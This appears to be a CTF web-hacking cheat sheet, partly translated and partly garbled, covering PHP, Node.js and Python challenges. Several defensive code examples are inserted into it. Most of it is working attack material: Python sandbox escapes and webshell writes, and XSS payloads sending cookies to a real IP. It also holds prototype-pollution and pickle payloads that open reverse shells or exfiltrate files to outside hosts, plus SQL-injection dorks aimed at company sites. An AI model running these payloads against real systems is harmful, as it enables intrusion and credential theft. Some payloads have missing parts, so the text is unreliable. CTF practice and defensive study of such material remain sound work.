[os := __import__('os'), itertools := __loader__.load_module('itertools'), _posixsubprocess := __loader__.load_module('_posixsubprocess'), [_posixsubprocess.fork_exec([b'/bin/sh'], [b'/bin/sh'], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False, None, None, None, -1, None) for i in (0,)]]

Random numbers
Output stream redirection

__import__('sys').stdout.write(__import__('os').read(__import__('os').open('flag', __import__('os').O_RDONLY), 0x114).decode())

int(str(__import__('sys')._getframe(1).f_locals['right_guesser_question_answer']))

Rewinding the random state

random := __import__('random'), state := random.getstate(), pre_state := list(state[1])[:624], random.setstate((3, tuple(pre_state + [0]), None)), random.randint(1, 9999999999999)

Function tricks

(lambda: os.system('cat flag'))()

class WOOD(type):
    __getitem__ = os.system

class WHALE(metaclass=WOOD):
    pass

tmp = WHALE['sh']

Obscure challenges

PHP using native classes, eval(" ", $ )

action=%5ccreate_function&arg=}system('cat /sec*');//

Reading via zip

https://game.sycsec/include.php?file=zip://upload/1cmd.jpg.zip%23cmd.jpg

Bypass via local variable replacement

preg_replace( |$option= .* ;| , $option= $str ;, $file);

Original CTF competition problems

CTFSHOW competition originals (web680-web695)

Race condition

<?php ?> ;

file_put_contents('1.php', $a); ?>

XSS topics

img filtered

<script>document.location.href='http://47.99.125.16/receive.php?cookie='</script>

script filtered

<body onload=document.location.href='http://47.99.125.16/receive.php?cookie='></body>

Spaces filtered

body/onload=document.location='http://47.99.125.16/receive.php?cookie=';

Summary

<script>('http://47.99.125.16/receive.php?cookie=')</script>

<script>var img = (img);img.src = 'http://47.99.125.16/receive.php?cookie=?cookie=';</script>

<script>window.location.href='http://47.99.125.16/receive.php?cookie='</script>

<script>location.href='http://47.99.125.16/receive.php?cookie='</script>

<input onfocus=('http://47.99.125.16/receive.php?cookie=') autofocus>

<svg onload=('http://47.99.125.16/receive.php?cookie=')>

<iframe onload=('http://47.99.125.16/receive.php?cookie=')></iframe>

<body onload=('http://47.99.125.16/receive.php?cookie=')>
Exfiltrate the whole page
var img = new Image();
img.src = 'http://47.99.125.16/receive.php?cookie=' + document.querySelector('#top > div.layui-container').textContent;
document.body.append(img);

Node.js challenges

1. Exploitation inside eval

require('child_process').execSync('ls /').toString()

require('child_process').spawnSync('ls', ['/']).()

global._load('child_process').execSync('ls',
['.']).toString()

String concatenation quirks in JS:

console.log(5+[6,6]); //56,6
console.log('5'+6); //56
console.log('5'+[6,6]); //56,6

So: for something like ['a']+flag === 'a'+flag, if flag is flag{45}, both sides end up as aflag{45}, so md5(['a']+flag)===md5('a'+flag) certainly holds as well, while a!==b is still satisfied:

So we can also construct:

?a[a]=1&b[b]=1

3. Bypassing a length limit with an array

{"checkcode":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]}

Prototype pollution

Introductory article

// foo is a plain JavaScript object
let foo = {bar: 1}

// foo.bar is 1 at this point
console.log(foo.bar)

// modify foo's prototype (i.e. Object)
foo.__proto__.bar = 2

// because of the lookup order, foo.bar is still 1
console.log(foo.bar)

// now create an empty zoo object from Object
let zoo = {}

// look at zoo.bar
console.log(zoo.bar)

Finally, although zoo is an empty object {}, zoo.bar turns out to be 2. The reason is obvious: earlier we modified foo's prototype with foo.__proto__.bar = 2, and because foo is an instance of Object, that actually modified the Object class itself, giving it a property bar with the value 2.

Later, when we create zoo from Object with let zoo = {}, zoo naturally has a bar property as well.

So in an application, if an attacker can control and modify an object's prototype, they can affect every object that comes from the same class or its ancestor classes. This attack is prototype pollution. The payload has to be sent as JSON.
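An added example, not from the article: a recursive JSON merge that pollutes Object.prototype, next to a hardened merge that refuses the __proto__, constructor and prototype keys. The merge functions, the polluted property name and the JSON body are constructed for the demonstration.

```javascript
// Added example: how a recursive merge over attacker-supplied JSON reaches
// Object.prototype, and the key filtering that stops it.

// Vulnerable: every key is treated as data, so "__proto__" walks into the prototype.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const val = source[key];
    if (val !== null && typeof val === "object") {
      if (target[key] === undefined || typeof target[key] !== "object") target[key] = {};
      unsafeMerge(target[key], val); // target["__proto__"] is Object.prototype here
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Hardened: skips the keys that lead to the prototype chain and only descends
// into own properties of the target (a null-prototype target is another option).
const BLOCKED = new Set(["__proto__", "constructor", "prototype"]);
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED.has(key)) continue;
    const val = source[key];
    if (val !== null && typeof val === "object") {
      if (!Object.prototype.hasOwnProperty.call(target, key) || typeof target[key] !== "object") {
        target[key] = {};
      }
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Merges one JSON body into a fresh object and reports whether an unrelated,
// newly created object picked up the injected property. Cleans Object.prototype
// afterwards so repeated runs start from a clean state.
function pollutionCheck(mergeFn, body) {
  const before = ({}).polluted; // undefined while the prototype is clean
  mergeFn({}, JSON.parse(body)); // JSON.parse keeps "__proto__" as an own key
  const after = ({}).polluted;
  delete Object.prototype.polluted;
  return { before, after };
}

// Constructed attacker body, the shape of the {"__proto__":{...}} payloads above.
const sampleBody = '{"__proto__": {"polluted": "yes"}}';
console.log("unsafeMerge:", pollutionCheck(unsafeMerge, sampleBody)); // after: "yes"
console.log("safeMerge:", pollutionCheck(safeMerge, sampleBody));     // after: undefined
```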

Bypassing a plain-variable equality check

{__proto__:{ctfshow:6dboy}}

Escalating to RCE

{__proto__:{query:return global._load( child_process ).exec( bash -c \bash -i >& /dev/tcp/47.99.125.16/89 0>&1\ )}}

Nested functions

{__proto__:{__proto__:{query:return global._load( child_process ).exec( bash -c \bash -i >& /dev/tcp/47.99.125.16/89 0>&1\ )}}}

EJS template RCE

{__proto__:{__proto__:{outputFunctioname:_tmp1;global.require( child_process ).exec( bash -c \bash -i >& /dev/tcp/47.99.125.16/89 0>&1\ );var __tmp2}}}

If __proto__ is filtered, constructor.prototype can be used instead

{constructor.:
a=1;return global._load('child_process').execSync('cat /');//}

{constructor.: _tmp1;global.require('child_process').exec('bash -c \\bash -i >& /dev/tcp/xxx/4444 0>&1\\');var __tmp2}

Example

ctfshow

pear inclusion

pear is installed

register_argc_argv is enabled

There is a controllable include $_GET['f'] (even include $_GET['f'].'.php' works)

?file=/usr/local/lib/php/pearcmd.php&+config-create+/<?=eval($_POST[1]);?>+/var/www/html/a.php

1=system('ls'); send it with Burp; hackbar would URL-encode the <>

Don't copy this blindly: the first part is the include(pearcmd.php) call, the rest are the arguments passed to it.

?file=/usr/local/lib/php/pearcmd.php&lalala+install+-R+/var/www/html/+http://vps-ip/shell.php

Attacking php-fpm

python2 gopherus.py --exploit fastcgi

Function usage

Illegal parameter names

When the PHP version is below 8, a [ in a parameter name is converted to an underscore, but the conversion then hits an error, so any further illegal characters in that name are not converted. In other words, if [ comes first it is still turned into an underscore, but because of the error the illegal characters after it are left as they are.

$_GET['show_show.show']

show[show.show

Example 1:

Pass the parameter 1%2B1>2

Python usage

1. Regex extraction and calculation

import requests
import re
url = 'http://82.157.146.4:14709/'
payload = {
    'input': 12,
    'ans': 12
}
math = ''
res = requests.post(url, payload)
num_pattern = re.compile(r'<div style="display:inline;">(.*?)</div>')
num = num_pattern.findall(res.text)  # regex-extract the formula
payload = '9223372036854775807' + math.join(num)[0:-1]
print(payload)

pickle deserialization challenges

Common payload

return (commands.getoutput, ('ls /',))

import pickle
import urllib
import commands

class payload(object):
    def __reduce__(self):
        return (commands.getoutput, ('ls /',))

a = payload()
print urllib.quote(pickle.dumps(a))

import pickle
import base64


class GetShellWithPython(object):
    def __reduce__(self):
        import subprocess
        return (,
                (['python',
                  '-c',
                  'import os;'
                  'os.system("curl http://49.22.224.59:89?a=`cat /flag`");'],))


pickleData = pickle.dumps(GetShellWithPython())
pickle.loads(pickleData)
print(base64.b64encode(pickleData))

Php题目

心得:

1.preg_math过滤什么留下的就是使用的漏洞

过滤括号(,就用不用括号的,常见的有include、require、echo等,

include函数
    常用伪协议php:filter-->文件名已知
    data://text/plain,<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
?>
The stub above places no requirement on what precedes it or on the file extension, so the extension can be changed to anything else.

As soon as the phar file is compressed with the gzip command, this stub disappears from the file.

A phar is made up of the data, the signature over that data (20 bytes), and the signature format trailer (8 bytes).

Generate the phar file, then open it in 010 Editor and raise the property count to bypass __wakeup:

<?php

class Lovess
{
    public $ljt;
    public $dky;
    public $cmd;

    public function __construct()
    {
        $this->ljt = 'Misc';
        $this->dky = 'Re';
        $this->cmd = 'system($_POST[0]);';
    }
}

$o = new Lovess();
$phar = new Phar('phar.phar'); // the extension must be .phar while generating
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>'); // set the stub
$phar->setMetadata($o); // store the object as meta-data in the manifest; setMetadata() serializes it
$phar->addFromString('test.txt', 'test'); // add a file to the archive (the file name is lost in the original notes)
$phar->stopBuffering(); // the signature is computed automatically
# For this challenge, open the generated phar in 010 Editor and change the property count to bypass __wakeup
# phar.readonly must be set to Off in php.ini

Recomputing the signature after editing the file:

from hashlib import sha1
import gzip

with open('D:\\sublime text\\Sublime Text\\source\\反序列化\\phar.png', 'rb') as file:
    f = file.read()
s = f[:-28]  # the data that gets signed (everything before the 20-byte SHA-1 and the 8-byte trailer)
h = f[-8:]  # the signature type flag plus the GBMB marker
new_file = s + sha1(s).digest() + h  # data + signature + (type + GBMB)
f_gzip = gzip.GzipFile('D:\\sublime text\\Sublime Text\\source\\反序列化\\2.png', 'wb')
f_gzip.write(new_file)
f_gzip.close()
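The same data / signature / trailer layout read from the other side. This is an added example, not code from the original notes: a small checker an upload handler or a forensic triage script can run to tell whether a file carries a phar trailer and whether the stored digest still matches the data (the check PHP itself performs before it will unserialize the manifest meta-data). The sample bytes are constructed here; only the stub, signature and trailer are modelled, not a real manifest.

```python
import hashlib
import struct

# Signature-type flags stored in the trailer's 4-byte little-endian field
# (values from the phar file-format documentation) and their digest sizes.
PHAR_SIG = {
    0x0001: ("md5", 16),
    0x0002: ("sha1", 20),
    0x0004: ("sha256", 32),
    0x0008: ("sha512", 64),
}
PHAR_MAGIC = b"GBMB"
HALT_STUB = b"__HALT_COMPILER();"


def parse_phar_trailer(data: bytes) -> dict:
    """Split <data><signature><4-byte LE flag><"GBMB"> into its parts.

    Raises ValueError when the trailer is absent or the flag is unknown.
    """
    if len(data) < 8 or data[-4:] != PHAR_MAGIC:
        raise ValueError("no GBMB trailer: not a signed phar")
    flag = struct.unpack("<I", data[-8:-4])[0]
    if flag not in PHAR_SIG:
        raise ValueError(f"unknown signature type 0x{flag:04x}")
    algo, siglen = PHAR_SIG[flag]
    return {
        "algo": algo,
        "signed": data[:-(siglen + 8)],      # everything the digest covers
        "signature": data[-(siglen + 8):-8],  # the stored digest
    }


def verify_phar_signature(data: bytes) -> bool:
    """Recompute the digest over the data part and compare with the stored one."""
    t = parse_phar_trailer(data)
    return hashlib.new(t["algo"], t["signed"]).digest() == t["signature"]


def looks_like_phar(data: bytes) -> bool:
    """Upload-scanner heuristic: a phar needs the __HALT_COMPILER stub and,
    when signed, the GBMB trailer; a genuine image contains neither."""
    return HALT_STUB in data or data[-4:] == PHAR_MAGIC


def make_signed_blob(stub: bytes, body: bytes, flag: int = 0x0002) -> bytes:
    """Build a constructed phar-shaped blob: stub + body + digest + trailer."""
    algo, _ = PHAR_SIG[flag]
    signed = stub + body
    return signed + hashlib.new(algo, signed).digest() + struct.pack("<I", flag) + PHAR_MAGIC


# Constructed sample: a GIF header followed by a phar stub (the polyglot shape
# the notes describe) and a fake body, signed with SHA-1.
SAMPLE = make_signed_blob(b"GIF89a<?php __HALT_COMPILER(); ?>\r\n", b"fake-manifest-and-files")
# The same blob with one byte of the data part changed after signing.
TAMPERED = SAMPLE[:10] + b"X" + SAMPLE[11:]

if __name__ == "__main__":
    print(verify_phar_signature(SAMPLE))      # True
    print(verify_phar_signature(TAMPERED))    # False
    print(looks_like_phar(b"GIF89a\x01\x02"))  # False
```

The signature only proves the data part was not altered after the trailer was written; it says nothing about who wrote it, which is why the notes' re-signing script works. For uploads, the useful controls are rejecting anything containing the stub or trailer regardless of extension, and never passing user-controlled paths to file functions that honour the phar:// wrapper.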

Pear include

Method one: remote file download (download a remote webshell onto the target)

?file=/usr/local/lib/php/pearcmd.php&lalalainstall±R/var/www/html/http://vps-ip/shell.php

lalala: anything; the first argument is ignored, the second is the one that counts

install: install a remote package

-R: the directory to install into

/var/www/html/: the target directory

http://vps-ip/: where it downloads from

Method two: generate a config file, passing our malicious PHP code in as a config item

1=/usr/local/lib/php/pearcmd.php&±c/tmp/ctf.php±dman_dir=<?php%20eval($_POST[1]);?>±s

Method three: write a config file

GET /?file=/usr/local/lib/php/pearcmd.php&aaaaconfig-create/var/www/html/<?=`$_POST[1]`;?>shell.php

(there is a trailing space at the end)

POST/?config-create/&file=/usr/local/lib/php/pearcmd.php&/<?=system( cat${IFS}/f* );?>/var/www/html/test

1=localhost/usr/local/lib/php/pearcmd.php&/?=@eval($_POST[ cmd ]);?/var/www/html/test.php

Bypass for "same string must be equal under both weak and strict comparison": double-URL-encode a single character.

Function summary

assert()

basename()

Example 1:

It mistakes config.php for being in the current directory.

A filter was added.

Invisible characters get past the regex and are at the same time ignored by basename().

For example: Chinese characters, ?, 《, 》, ;

(basename vulnerability) [[Zer0pts2020] Can you guess it? (basename vulnerability) - CSDN blog]

parse_url

parse_url() breaks a URL down into its components.

Example 1:

Example 2:

host is cut off at : and /.

Here host is baidu and path is /aaa/bbb; note that path contains / while host cannot, so cd is used to get back to the root directory.

So for an input like http://ls/a.php, the pieces become echo ls > /a.php, which writes into the root directory and is awkward to reach.

To write into the current directory instead, construct the input so that the preceding part is closed early: http://1/1;echo `ls` > (note the backticks rather than system(): system is a PHP function, and here we are inside shell_exec(), where backticks mean command substitution); assert works too.

Example 3: multiple variables


host => user, user => pass, pass => query, and so on, which gives variable overwrite.

file_get_contents()

--> php wrappers --> data://text/plain,I have a dream -->

file_put_contents()

<?php
$dir = '/path/to/directory/'; // replace with the directory to save into
$code = 'echo "Hello, World!";'; // replace with the PHP code to write
$fuxkfile = ''; // replace with any additional content to write

file_put_contents($dir . 'index.php', '<?php ' . $code . $fuxkfile);
?>

In the example, file is closed off with ?>

Payload=?><?=nl%09/*

getip()

Controlled through the Client-IP header

Include()

php wrapper read --> pear file include --> session file include

· Reading files through a wrapper with double URL encoding

· Attacking the opcache cache

· Including pearcmd to plant a shell

· Target with outbound network access

· Target without outbound network access

· Bypassing the include-count limit

· include2shell

· compress.zlib to create a temporary file

· Including nginx temporary files

intval

if(intval($a)) --> bypass with an array: a[]

Is_number()

Returns 1 for numbers

Math.random()

#!/usr/bin/python
import z3
import struct
import sys

# Five consecutive Math.random() outputs observed from the target (as in the original notes)
sequence = [0.6199046082820001, 0.6626781965961, 0.719018168749095, 0.06169296721449724, 0.91579978059427]
sequence = sequence[::-1]  # V8 serves its cached outputs in reverse order

solver = z3.Solver()
se_state0, se_state1 = z3.BitVecs("se_state0 se_state1", 64)

for i in range(len(sequence)):
    # one symbolic step of xorshift128+
    se_s1 = se_state0
    se_s0 = se_state1
    se_state0 = se_s0
    se_s1 ^= se_s1 << 23
    se_s1 ^= z3.LShR(se_s1, 17)
    se_s1 ^= se_s0
    se_s1 ^= z3.LShR(se_s0, 26)
    se_state1 = se_s1
    # take the 52-bit mantissa of the observed double and tie it to the state
    float_64 = struct.pack("d", sequence[i] + 1)
    u_long_long_64 = struct.unpack("<Q", float_64)[0]
    mantissa = u_long_long_64 & ((1 << 52) - 1)
    solver.add(int(mantissa) == z3.LShR(se_state0, 12))

if solver.check() == z3.sat:
    model = solver.model()
    states = {}
    for state in model.decls():
        states[str(state)] = model[state]
    state0 = states["se_state0"].as_long()
    # rebuild the next double from the recovered state
    u_long_long_64 = (state0 >> 12) | 0x3FF0000000000000
    float_64 = struct.pack("<Q", u_long_long_64)
    next_sequence = struct.unpack("d", float_64)[0]
    next_sequence -= 1
    print(next_sequence)

Pathinfo()

  • You can access the different pieces of the associative array returned by `pathinfo()` as follows:

    - `$info['dirname']`: the directory the file is in.
    - `$info['basename']`: the full base name (file name plus extension).
    - `$info['extension']`: the file extension.
    - `$info['filename']`: the file name without the extension.

toLowerCase

The Kelvin sign K (U+212A) lowercases to the ASCII k, that is 'K'.toLowerCase() == 'k'.

toUpperCase

These two characters uppercase to I and S, that is 'ı'.toUpperCase() == 'I' and 'ſ'.toUpperCase() == 'S'. This quirk can get past some checks.

Array_search

Bypass with test[]=0

Call_user_func

ctfshow=ctfshow::getFlag   (class first, then method)

ctfshow[0]=ctfshow&ctfshow[1]=getFlag #POST

phpinfo

putenv

[BASH_FUC_echo%25%25]=()%20{%20cat /f*;%20}

How I used environment-variable injection to execute arbitrary commands - Tencent Cloud Developer Community

Connect directly

parse_str()

Pass _POST[key1]=6d via GET.

parse_str() parses the string into the $_POST array, which then holds a key-value pair.

The effect is the same as sending key1=6d by POST.

Strpos()

// a match is enough: php://filter/read=convert.base64-encode/woofers/resource=flag. Each filter in the wrapper is selected by a known key, so an unrecognised segment such as woofers is skipped, yet it is enough to get past the strpos() check in this challenge.

escapeshellcmd

A backslash (\) is inserted before each of these characters: &#;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only when they are not paired.

escapeshellarg() + escapeshellcmd()

The input `172.17.0.2' -v -d a=1` becomes `'172.17.0.2'\'' -v -d a=1'` after escapeshellarg(): the single quote is escaped first, then the left and right parts are each wrapped in single quotes so that they join up. After escapeshellcmd() it becomes `'172.17.0.2'\\'' -v -d a=1\'`, because escapeshellcmd() escapes the `\` as well as the final, unpaired quote (PHP: escapeshellcmd - Manual). The command finally run is `curl '172.17.0.2'\\'' -v -d a=1\'`; since the `\\` in the middle is now a literal `\` and no longer escapes anything, the `'` after it is not escaped and pairs with the next `'` to form an empty string. So it simplifies to `curl 172.17.0.2\ -v -d a=1'`, that is, a request to 172.17.0.2\ with POST data a=1'.

Sample: <?= @eval($_POST[pd]);?> -oG pd.phtml
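The double-escaping result above, traced through in code. This is an added example, not code from the original notes: escapeshellarg() and escapeshellcmd() are re-implemented here in Python from the PHP manual's documented rules (the quote-pairing rule included), and shlex.split() stands in for the shell's word splitting, so the difference in resulting argv can be asserted rather than eyeballed. The input string is the notes' own example.

```python
import shlex


def escapeshellarg(arg: str) -> str:
    """PHP escapeshellarg(): wrap in single quotes, turning every embedded '
    into '\\'' (close the quote, escaped quote, reopen the quote)."""
    return "'" + arg.replace("'", "'\\''") + "'"


# Characters escapeshellcmd() always prefixes with a backslash (PHP manual list),
# plus \x0A and \xFF.
_CMD_SPECIAL = set("#&;`|*?~<>^()[]{}$\\\x0a\xff")


def escapeshellcmd(cmd: str) -> str:
    """PHP escapeshellcmd(): backslash the characters above; a ' or " is
    escaped only when it has no later partner of the same kind."""
    out = []
    partner = None  # index of the quote that closes the currently open pair
    for i, ch in enumerate(cmd):
        if ch in "'\"":
            if partner is None:
                nxt = cmd.find(ch, i + 1)
                if nxt != -1:
                    partner = nxt          # paired: both quotes stay unescaped
                else:
                    out.append("\\")       # unpaired: escape it
            elif i == partner:
                partner = None             # this quote closes the pair
            else:
                out.append("\\")           # a different quote inside a pair
            out.append(ch)
        elif ch in _CMD_SPECIAL:
            out.append("\\" + ch)
        else:
            out.append(ch)
    return "".join(out)


def shell_argv(command: str) -> list:
    """Split a command line the way a POSIX shell would, without running it."""
    return shlex.split(command)


# The notes' example input: a stray quote followed by extra options.
USER_INPUT = "172.17.0.2' -v -d a=1"


def argv_with_both() -> list:
    """The broken pattern: escapeshellarg() and then escapeshellcmd()."""
    return shell_argv("curl " + escapeshellcmd(escapeshellarg(USER_INPUT)))


def argv_with_arg_only() -> list:
    """The correct pattern: escapeshellarg() alone keeps the input one argument."""
    return shell_argv("curl " + escapeshellarg(USER_INPUT))


if __name__ == "__main__":
    print(argv_with_both())      # ['curl', '172.17.0.2\\', '-v', '-d', "a=1'"]
    print(argv_with_arg_only())  # ['curl', "172.17.0.2' -v -d a=1"]
```

The takeaway for code review: the two functions are alternatives, not layers. escapeshellcmd() protects a whole command string, escapeshellarg() protects one argument; stacking them lets a single quote in the input turn one argument into several. Better still is to avoid the shell entirely, for instance proc_open() with an array command (PHP 7.4 and later) or the language's native HTTP client instead of curl.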

Exit()

PHP exit() "death" bypass - xiaolong's blog

date()

Note that date() performs escaping: it turns /f\l\a\g into /flag

Create_function()

$nss_shell = create_function($shell,$nss);

shell=){}system( cat /f* );//&nss=12

When the parameter is controllable: };system($_POST[1]);//

After use, an anonymous function is named \000lambda_1, and the number grows by one with each use, so construct d0g so that the anonymous function is closed off and executes.

For other functions, name is \000lambda_<payload length>, which gets you into command execution.

A normal upload swallows the \000.

import requests

req = requests.session()

OUTPUT_FILE = 'OUTPUT_FILE_PLACEHOLDER'  # the file name is elided in the original notes
ATTEMPTS = 1                             # the loop's upper bound is elided in the original notes

with open(OUTPUT_FILE, 'a') as f:
    for i in range(1, ATTEMPTS):
        str = '\000'  # leading NUL byte of the lambda name (a normal upload would swallow it)
        payload = "?d0g=11111include']);}phpinfo();/*&name="
        payload = payload + str + 'lambda_0'
        res = req.get('http://47.108.206.4:621' + payload)  # URL as in the original notes
        print(res.text, file=f)  # what was printed is elided in the original; res.text assumed

Yaml.load()

name : { toString: !!js/function function(){ flag = require( child_process ).execSync( cat /fla* ).toString(); return flag;}}

$_REQUEST

Accepts both POST and GET, but POST takes precedence, which allows a bypass

$_SERVER['QUERY_STRING']

Bypass with URL encoding

toUpperCase()

The characters ı and ſ become I and S after toUpperCase()

toLowerCase():

The character K becomes k after toLowerCase() (this K is the Kelvin sign, not the ASCII K)

fastcgi_pass

Attacking FastCGI with gopher

Deserialization challenges:

if (!preg_match('/[a-zA-Z0-9~-_=!\^()]/', $this->gg2)) {

The regex check triggers __toString

String escape

String escape is essentially also a matter of closing off the structure, but it comes in two cases: the characters increase, or the characters decrease.

Characters increase

How much overflows depends on the length of ;i:1;s:2:"20";}

Characters decrease

Use two variables to control it: the first segment shrinks and swallows the original second segment, stopping at the second segment's hello; that opens the next element directly, and since s:54 has been swallowed, what follows is under our control.

The first variable is then what we escape with:

hello";s:4:"sign";s:4:"eval";s:6:"number";s:4:"2000";}

which also includes a made-up variable of our own
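Both escape cases above come down to one fact: PHP's unserialize() trusts the declared lengths and silently ignores whatever follows the first complete value, so any filter that changes string lengths after serialization shifts the boundaries. The added example below, which is not code from the original notes, is a strict parser for a subset of the serialize() format that enforces each length field exactly and reports leftover bytes, together with a constructed "sanitizer" that lengthens x to xx after serialization to reproduce the characters-increase case; the user record and field names are constructed.

```python
class PhpUnserializeError(ValueError):
    """Malformed data or a length field that does not line up with its delimiter."""


def _parse(payload: str, pos: int = 0):
    """Parse one value in PHP's serialize() format (N, i, s, a, O).
    Returns (value, position just after it); never skips bytes."""

    def read_until(tok):
        nonlocal pos
        end = payload.find(tok, pos)
        if end == -1:
            raise PhpUnserializeError(f"missing {tok!r} after offset {pos}")
        val, pos = payload[pos:end], end + len(tok)
        return val

    def expect(tok):
        nonlocal pos
        if not payload.startswith(tok, pos):
            raise PhpUnserializeError(f"expected {tok!r} at offset {pos}")
        pos += len(tok)

    def read_quoted(close):
        # <len>:"<bytes>" followed by close ('";' for strings, '":' for class names);
        # the declared length must land exactly on that delimiter.
        nonlocal pos
        length = int(read_until(":"))
        expect('"')
        if pos + length > len(payload):
            raise PhpUnserializeError(f"declared length {length} runs past the end")
        val = payload[pos:pos + length]
        pos += length
        expect(close)
        return val

    def members(count):
        out = {}
        for _ in range(count):
            key = value()
            out[key] = value()
        return out

    def value():
        nonlocal pos
        tag = payload[pos:pos + 1]
        if tag == "N":
            expect("N;")
            return None
        if tag == "i":
            expect("i:")
            return int(read_until(";"))
        if tag == "s":
            expect("s:")
            return read_quoted('";')
        if tag == "a":
            expect("a:")
            count = int(read_until(":"))
            expect("{")
            out = members(count)
            expect("}")
            return out
        if tag == "O":
            expect("O:")
            cls = read_quoted('":')
            count = int(read_until(":"))
            expect("{")
            out = {"__class__": cls, **members(count)}
            expect("}")
            return out
        raise PhpUnserializeError(f"unknown tag {tag!r} at offset {pos}")

    result = value()
    return result, pos


def php_unserialize(payload: str):
    """Returns (value, leftover). PHP's unserialize() drops the leftover
    silently; a strict consumer must treat a non-empty leftover as an error."""
    result, end = _parse(payload)
    return result, payload[end:]


def is_strictly_valid(payload: str) -> bool:
    """True only when the data parses and nothing is left over."""
    try:
        return php_unserialize(payload)[1] == ""
    except ValueError:
        return False


# Constructed scenario: a record serialized as an array, then run through a
# "sanitizer" that rewrites x -> xx on the already-serialized text.
def serialize_user(name: str, sign: str) -> str:
    return 'a:2:{s:4:"name";s:%d:"%s";s:4:"sign";s:%d:"%s";}' % (len(name), name, len(sign), sign)


def buggy_filter(serialized: str) -> str:
    return serialized.replace("x", "xx")


INJECTED_TAIL = '";s:4:"sign";s:5:"admin";}'             # 26 characters
CRAFTED_NAME = "x" * len(INJECTED_TAIL) + INJECTED_TAIL  # 26 x's grow to 52 = declared length
ESCAPED = buggy_filter(serialize_user(CRAFTED_NAME, "user"))
BENIGN = serialize_user("alice", "user")
```

Run against ESCAPED, php_unserialize() returns sign = admin with the original `";s:4:"sign";s:4:"user";}` left dangling, which is exactly what a lenient PHP unserialize() would accept; is_strictly_valid() rejects it. The real fix is upstream of the parser: never transform serialized text (filter the fields before serializing), and for untrusted input prefer JSON or a signed blob over unserialize() altogether.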

Destruct trigger

public function __destruct(){
    global $flag;
    echo $flag;
}

· Character-filter bypass: function names, method names and class names are case-insensitive

if(preg_match('/ctfshow/', $cs)){

Case-sensitive: variable names, constant names, array indexes (keys). Case-insensitive: function names, method names, class names, magic constants, NULL, FALSE, TRUE.

Bypassing throw new Exception: force GC so that __destruct() runs

#O:4:"test":1:{s:5:"test1";s:2:"aa";}  // change the 1 here to 0 and the object is destroyed normally
$str = 'O:4:"test":0:{s:5:"test1";s:2:"aa";}';

Fastapi

It ships with interactive API docs: visiting /docs reveals a /cccalccc endpoint that takes POST parameters, where the parameter q accepts an expression and returns its result.

Worked examples

Common problems

1. Can't read the file?

Try reading it through a PHP wrapper

File=php://filter/convert.base64-encode/resource=flag.php

  1. MD5 length-extension attack (hashpump)

Input Signature # the existing hash (the MD5 the challenge gives you)

Input Data # the known string

Input Key Length # the length of the secret (salt)

Input Data to Add # the string you append after the padding (your choice)

SRC (bug bounty) path:

Getting started:

Beginner notes on getting started

1. Installing AWVS

Scanning for vulnerabilities

java -javaagent:rexha.jar -jar rexha.jar

Lookup platforms:

ICP filing lookup for subdomains - https://gov/#/Integrated/recordQuery

whois reverse lookup - Domain Whois lookup - Webmaster Tools (chinaz)

Subdomain lookup - https://chaziyu; IP lookup / reverse IP lookup / same-IP domain lookup

Chinaz: Baidu weight lookup - Webmaster Tools

ICP filing lookup: https://gov/ ; Hunter (鹰图) platform

IP address lookup: IP address lookup - online tools (IP lookup, same-IP sites, reverse IP to domain)

SQL vulnerabilities:

Google dorks:

company inurl:php?id=

company inurl:asp?id=

company inurl:aspx?id=

Admin panels: inurl:/admin/login.php

    inurl:"Product.asp?BigClassName"

Original URL: http://www.dnpztj.cn/biancheng/1108860.html

Tags: none
Uploaded: 2025-07-16 12:43:44